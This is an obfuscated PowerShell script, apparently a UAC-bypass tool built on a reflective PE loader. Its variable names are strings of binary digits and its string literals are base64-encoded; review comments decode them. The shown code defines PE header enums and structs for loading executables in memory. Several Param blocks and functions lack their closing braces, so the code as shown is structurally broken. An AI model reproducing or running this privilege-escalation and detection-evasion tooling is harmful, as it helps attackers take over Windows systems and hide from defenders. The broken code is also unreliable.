function dccuacbypass
function _00011001001110011
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $true)]
[ValidateNotNullOrEmpty()]
[Byte[]]
${_00000000110100000},
[Parameter(Position = 1)]
[String[]]
${_00101101101110100},
[Parameter(Position = 2)]
[ValidateSet( 'WString', 'String', 'Void' )]
[String]
${_00000001011111110} = 'Void',
[Parameter(Position = 3)]
[String]
${_01011011000001101},
[Parameter(Position = 4)]
[Int32]
${_10101000101011101},
[Parameter(Position = 5)]
[String]
${_00010101111010101},
[Switch]
${_00100110100011000},
[Switch]
${_00101011011011001}
Set-StrictMode -Version 2
${10100010000001110} = {
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Byte[]]
${_00000000110100000},
[Parameter(Position = 1, Mandatory = $true)]
[String]
${_00000001011111110},
[Parameter(Position = 2, Mandatory = $true)]
[Int32]
${_10101000101011101},
[Parameter(Position = 3, Mandatory = $true)]
[String]
${_00010101111010101},
[Parameter(Position = 4, Mandatory = $true)]
[Bool]
${_00100110100011000}
Function _10100111101101101
# Container object; every type generated below is attached to it as a NoteProperty.
$Win32Types = New-Object System.Object
# Create a run-only (AssemblyBuilderAccess.Run) dynamic assembly and module in the
# current AppDomain to hold the emitted types.
# String literals are wrapped as Unicode.GetString(FromBase64String(...)), so the
# names do not appear in clear text in the script; the two below decode (UTF-16LE)
# to 'DynamicAssembly' and 'DynamicModule'.
${01010101000100100} = [AppDomain]::CurrentDomain
${10010010110101001} = New-Object System.Reflection.AssemblyName($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RAB5AG4AYQBtAGkAYwBBAHMAcwBlAG0AYgBsAHkA'))))
${01011010111011001} = ${01010101000100100}.DefineDynamicAssembly(${10010010110101001}, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
${00101100111000111} = ${01011010111011001}.DefineDynamicModule($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RAB5AG4AYQBtAGkAYwBNAG8AZAB1AGwAZQA='))), $false)
# First constructor of MarshalAsAttribute; it is not referenced again in the
# enum/struct definitions that immediately follow (NOTE(review): its use is
# presumably further down the function - confirm).
${10101111111100000} = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
# Emit a public UInt16 enum; the base64 strings decode (UTF-16LE) to the enum name
# 'MachineType', visibility 'Public', and the literals
# Native = 0, I386 = 0x014c, Itanium = 0x0200, x64 = 0x8664.
${10001111001010101} = ${00101100111000111}.DefineEnum($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGMAaABpAG4AZQBUAHkAcABlAA=='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))), [UInt16])
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBhAHQAaQB2AGUA'))), [UInt16] 0) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQAzADgANgA='))), [UInt16] 0x014c) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQB0AGEAbgBpAHUAbQA='))), [UInt16] 0x0200) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('eAA2ADQA'))), [UInt16] 0x8664) | Out-Null
# Finalize the enum and expose it as $Win32Types.MachineType.
${10101000000111000} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value ${10101000000111000}
# Emit the public UInt16 enum 'MagicType' (names are base64 of UTF-16LE text):
# IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10b, IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20b.
# The builder variable from the previous enum is reused.
${10001111001010101} = ${00101100111000111}.DefineEnum($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGcAaQBjAFQAeQBwAGUA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))), [UInt16])
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ATgBUAF8ATwBQAFQASQBPAE4AQQBMAF8ASABEAFIAMwAyAF8ATQBBAEcASQBDAA=='))), [UInt16] 0x10b) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ATgBUAF8ATwBQAFQASQBPAE4AQQBMAF8ASABEAFIANgA0AF8ATQBBAEcASQBDAA=='))), [UInt16] 0x20b) | Out-Null
# Finalize the enum and expose it as $Win32Types.MagicType.
${10011000111111001} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value ${10011000111111001}
# Emit the public UInt16 enum 'SubSystemType'. The base64 (UTF-16LE) literal names
# decode to the IMAGE_SUBSYSTEM_* constants, in order:
#   UNKNOWN = 0, NATIVE = 1, WINDOWS_GUI = 2, WINDOWS_CUI = 3, POSIX_CUI = 7,
#   WINDOWS_CE_GUI = 9, EFI_APPLICATION = 10, EFI_BOOT_SERVICE_DRIVER = 11,
#   EFI_RUNTIME_DRIVER = 12, EFI_ROM = 13, XBOX = 14.
${10001111001010101} = ${00101100111000111}.DefineEnum($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB1AGIAUwB5AHMAdABlAG0AVAB5AHAAZQA='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))), [UInt16])
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBVAE4ASwBOAE8AVwBOAA=='))), [UInt16] 0) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBOAEEAVABJAFYARQA='))), [UInt16] 1) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBXAEkATgBEAE8AVwBTAF8ARwBVAEkA'))), [UInt16] 2) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBXAEkATgBEAE8AVwBTAF8AQwBVAEkA'))), [UInt16] 3) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBQAE8AUwBJAFgAXwBDAFUASQA='))), [UInt16] 7) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBXAEkATgBEAE8AVwBTAF8AQwBFAF8ARwBVAEkA'))), [UInt16] 9) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBFAEYASQBfAEEAUABQAEwASQBDAEEAVABJAE8ATgA='))), [UInt16] 10) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBFAEYASQBfAEIATwBPAFQAXwBTAEUAUgBWAEkAQwBFAF8ARABSAEkAVgBFAFIA'))), [UInt16] 11) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBFAEYASQBfAFIAVQBOAFQASQBNAEUAXwBEAFIASQBWAEUAUgA='))), [UInt16] 12) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBFAEYASQBfAFIATwBNAA=='))), [UInt16] 13) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBYAEIATwBYAA=='))), [UInt16] 14) | Out-Null
# Finalize the enum and expose it as $Win32Types.SubSystemType.
${01011100100100011} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value ${01011100100100011}
# Emit the public UInt16 flag-style enum 'DllCharacteristicsType'. Decoded
# (base64 -> UTF-16LE) literal names, in order:
#   RES_0 = 0x0001, RES_1 = 0x0002, RES_2 = 0x0004, RES_3 = 0x0008,
#   IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE = 0x0040,
#   IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY = 0x0080,
#   IMAGE_DLL_CHARACTERISTICS_NX_COMPAT = 0x0100,
#   IMAGE_DLLCHARACTERISTICS_NO_ISOLATION = 0x0200,
#   IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400,
#   IMAGE_DLLCHARACTERISTICS_NO_BIND = 0x0800,
#   RES_4 = 0x1000,
#   IMAGE_DLLCHARACTERISTICS_WDM_DRIVER = 0x2000,
#   IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE = 0x8000.
# The inconsistent DLL_CHARACTERISTICS / DLLCHARACTERISTICS spelling is in the
# encoded names themselves.
${10001111001010101} = ${00101100111000111}.DefineEnum($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABsAGwAQwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMAVAB5AHAAZQA='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))), [UInt16])
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBFAFMAXwAwAA=='))), [UInt16] 0x0001) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBFAFMAXwAxAA=='))), [UInt16] 0x0002) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBFAFMAXwAyAA=='))), [UInt16] 0x0004) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBFAFMAXwAzAA=='))), [UInt16] 0x0008) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAXwBDAEgAQQBSAEEAQwBUAEUAUgBJAFMAVABJAEMAUwBfAEQAWQBOAEEATQBJAEMAXwBCAEEAUwBFAA=='))), [UInt16] 0x0040) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAXwBDAEgAQQBSAEEAQwBUAEUAUgBJAFMAVABJAEMAUwBfAEYATwBSAEMARQBfAEkATgBUAEUARwBSAEkAVABZAA=='))), [UInt16] 0x0080) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAXwBDAEgAQQBSAEEAQwBUAEUAUgBJAFMAVABJAEMAUwBfAE4AWABfAEMATwBNAFAAQQBUAA=='))), [UInt16] 0x0100) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAQwBIAEEAUgBBAEMAVABFAFIASQBTAFQASQBDAFMAXwBOAE8AXwBJAFMATwBMAEEAVABJAE8ATgA='))), [UInt16] 0x0200) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAQwBIAEEAUgBBAEMAVABFAFIASQBTAFQASQBDAFMAXwBOAE8AXwBTAEUASAA='))), [UInt16] 0x0400) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAQwBIAEEAUgBBAEMAVABFAFIASQBTAFQASQBDAFMAXwBOAE8AXwBCAEkATgBEAA=='))), [UInt16] 0x0800) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBFAFMAXwA0AA=='))), [UInt16] 0x1000) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAQwBIAEEAUgBBAEMAVABFAFIASQBTAFQASQBDAFMAXwBXAEQATQBfAEQAUgBJAFYARQBSAA=='))), [UInt16] 0x2000) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAQwBIAEEAUgBBAEMAVABFAFIASQBTAFQASQBDAFMAXwBUAEUAUgBNAEkATgBBAEwAXwBTAEUAUgBWAEUAUgBfAEEAVwBBAFIARQA='))), [UInt16] 0x8000) | Out-Null
# Finalize the enum and expose it as $Win32Types.DllCharacteristicsType.
${01100101010001010} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value ${01100101010001010}
# Type attributes string; decodes (base64 -> UTF-16LE) to
# 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'.
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAEUAeABwAGwAaQBjAGkAdABMAGEAeQBvAHUAdAAsACAAUwBlAGEAbABlAGQALAAgAEIAZQBmAG8AcgBlAEYAaQBlAGwAZABJAG4AaQB0AA==')))
# Emit the 8-byte value type 'IMAGE_DATA_DIRECTORY' with two public UInt32 fields
# placed at explicit offsets: VirtualAddress at 0 and Size at 4.
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABBAFQAQQBfAEQASQBSAEUAQwBUAE8AUgBZAA=='))), ${01001001010001110}, [System.ValueType], 8)
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABBAGQAZAByAGUAcwBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(0) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(4) | Out-Null
# Finalize the struct and expose it as $Win32Types.IMAGE_DATA_DIRECTORY.
${00101010111001100} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value ${00101010111001100}
# Type attributes string; decodes (base64 -> UTF-16LE) to
# 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'.
# Sequential layout is used here, so the fields below carry no SetOffset calls.
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
# Emit the 20-byte value type 'IMAGE_FILE_HEADER'. Public fields in declaration order:
#   Machine (UInt16), NumberOfSections (UInt16), TimeDateStamp (UInt32),
#   PointerToSymbolTable (UInt32), NumberOfSymbols (UInt32),
#   SizeOfOptionalHeader (UInt16), Characteristics (UInt16).
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARgBJAEwARQBfAEgARQBBAEQARQBSAA=='))), ${01001001010001110}, [System.ValueType], 20)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGMAaABpAG4AZQA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAFMAZQBjAHQAaQBvAG4AcwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABpAG0AZQBEAGEAdABlAFMAdABhAG0AcAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAGkAbgB0AGUAcgBUAG8AUwB5AG0AYgBvAGwAVABhAGIAbABlAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAFMAeQBtAGIAbwBsAHMA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYATwBwAHQAaQBvAG4AYQBsAEgAZQBhAGQAZQByAA=='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMA'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
# Finalize the struct and expose it as $Win32Types.IMAGE_FILE_HEADER.
${01000101100110000} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value ${01000101100110000}
# Type attributes string; decodes (base64 -> UTF-16LE) to
# 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'.
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAEUAeABwAGwAaQBjAGkAdABMAGEAeQBvAHUAdAAsACAAUwBlAGEAbABlAGQALAAgAEIAZQBmAG8AcgBlAEYAaQBlAGwAZABJAG4AaQB0AA==')))
# Emit the 240-byte value type 'IMAGE_OPTIONAL_HEADER64' (the 64-bit PE optional
# header), every field public and pinned with SetOffset.
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ATwBQAFQASQBPAE4AQQBMAF8ASABFAEEARABFAFIANgA0AA=='))), ${01001001010001110}, [System.ValueType], 240)
# Scalar header fields, offsets 0-108. Decoded names in order: Magic,
# MajorLinkerVersion, MinorLinkerVersion, SizeOfCode, SizeOfInitializedData,
# SizeOfUninitializedData, AddressOfEntryPoint, BaseOfCode, ImageBase (UInt64 at 24),
# SectionAlignment, FileAlignment, Major/MinorOperatingSystemVersion,
# Major/MinorImageVersion, Major/MinorSubsystemVersion, Win32VersionValue,
# SizeOfImage, SizeOfHeaders, CheckSum, Subsystem, DllCharacteristics,
# SizeOfStackReserve, SizeOfStackCommit, SizeOfHeapReserve, SizeOfHeapCommit
# (all UInt64), LoaderFlags, NumberOfRvaAndSizes.
# Magic, Subsystem and DllCharacteristics are typed with the MagicType,
# SubSystemType and DllCharacteristicsType enums created earlier in this function.
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGcAaQBjAA=='))), ${10011000111111001}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(0) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAEwAaQBuAGsAZQByAFYAZQByAHMAaQBvAG4A'))), [Byte], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(2) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAEwAaQBuAGsAZQByAFYAZQByAHMAaQBvAG4A'))), [Byte], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(3) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAQwBvAGQAZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(4) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASQBuAGkAdABpAGEAbABpAHoAZQBkAEQAYQB0AGEA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(8) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAVQBuAGkAbgBpAHQAaQBhAGwAaQB6AGUAZABEAGEAdABhAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(12) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAGQAcgBlAHMAcwBPAGYARQBuAHQAcgB5AFAAbwBpAG4AdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(16) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBhAHMAZQBPAGYAQwBvAGQAZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(20) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBtAGEAZwBlAEIAYQBzAGUA'))), [UInt64], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(24) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGMAdABpAG8AbgBBAGwAaQBnAG4AbQBlAG4AdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(32) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBpAGwAZQBBAGwAaQBnAG4AbQBlAG4AdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(36) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(40) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(42) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAEkAbQBhAGcAZQBWAGUAcgBzAGkAbwBuAA=='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(44) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAEkAbQBhAGcAZQBWAGUAcgBzAGkAbwBuAA=='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(46) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAFMAdQBiAHMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(48) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAFMAdQBiAHMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(50) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AMwAyAFYAZQByAHMAaQBvAG4AVgBhAGwAdQBlAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(52) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASQBtAGEAZwBlAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(56) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASABlAGEAZABlAHIAcwA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(60) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGUAYwBrAFMAdQBtAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(64) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB1AGIAcwB5AHMAdABlAG0A'))), ${01011100100100011}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(68) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABsAGwAQwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMA'))), ${01100101010001010}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(70) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAUwB0AGEAYwBrAFIAZQBzAGUAcgB2AGUA'))), [UInt64], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(72) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAUwB0AGEAYwBrAEMAbwBtAG0AaQB0AA=='))), [UInt64], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(80) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASABlAGEAcABSAGUAcwBlAHIAdgBlAA=='))), [UInt64], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(88) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASABlAGEAcABDAG8AbQBtAGkAdAA='))), [UInt64], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(96) | Out-Null
